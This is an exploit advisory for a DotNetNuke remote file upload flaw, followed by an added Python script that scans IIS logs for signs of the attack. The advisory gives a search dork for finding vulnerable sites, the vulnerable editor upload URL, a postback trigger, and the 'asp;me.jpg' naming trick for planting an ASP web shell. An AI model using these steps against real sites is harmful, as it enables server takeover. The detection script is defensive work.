************************************************************
** DotNetNuke Remote File upload Vulnerability
************************************************************
** Product: DotNetNuke
** Home : www.DZ4All.cOm/Cc
** Vulnerability : Remote File upload
** Risk : High
** Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors : Ra3cH & Ma3sTr0-Dz
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
** Exploit:
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')
**
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg
************************************************************
**
** You find your shell here
**
** http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************
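
A defensive check for the traces this advisory describes, as an added example that is not part of the original advisory: it scans IIS W3C log lines for POSTs to the link gallery page and for requests to file names where a script extension is followed by ';'. The extension list, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re

# Script extensions treated as executable (assumed list; extend per site).
SCRIPT_EXT = r"(?:asp|aspx|asa|cer|cdx|ashx|asmx)"
# "name.asp;anything" in the last path segment, as in the advisory's file name.
SEMICOLON_NAME = re.compile(r"\." + SCRIPT_EXT + r";[^/]*$", re.I)
# Any script requested directly from a portal content directory
# (assumption: that directory should only serve static uploads).
PORTAL_SCRIPT = re.compile(r"^/portals/\d+/.*\." + SCRIPT_EXT + r"(?:;[^/]*)?$", re.I)
# Upload page named in the advisory; [PATH] may add a prefix, so match the suffix.
UPLOADER = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

def scan_iis_log(lines):
    """Return (line_no, rule, client_ip, uri) for each suspicious W3C log entry."""
    fields, hits = [], []
    for no, line in enumerate(lines, 1):
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        uri = row.get("cs-uri-stem", "")
        ip = row.get("c-ip", "-")
        if SEMICOLON_NAME.search(uri):
            hits.append((no, "semicolon-extension", ip, uri))
        elif PORTAL_SCRIPT.match(uri):
            hits.append((no, "script-in-portals", ip, uri))
        elif row.get("cs-method") == "POST" and uri.lower().endswith(UPLOADER):
            # Editors also use this page legitimately: context, not proof.
            hits.append((no, "linkgallery-post", ip, uri))
    return hits

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-05-18 10:01:02 GET /Default.aspx tabid=176 198.51.100.7 200
2009-05-18 10:01:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2009-05-18 10:02:11 GET /portals/0/example.asp;me.jpg - 198.51.100.7 200
2009-05-18 10:03:00 GET /portals/0/logo.jpg - 192.0.2.10 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

A "linkgallery-post" hit followed by a "semicolon-extension" hit from the same client address is the sequence to prioritise for review.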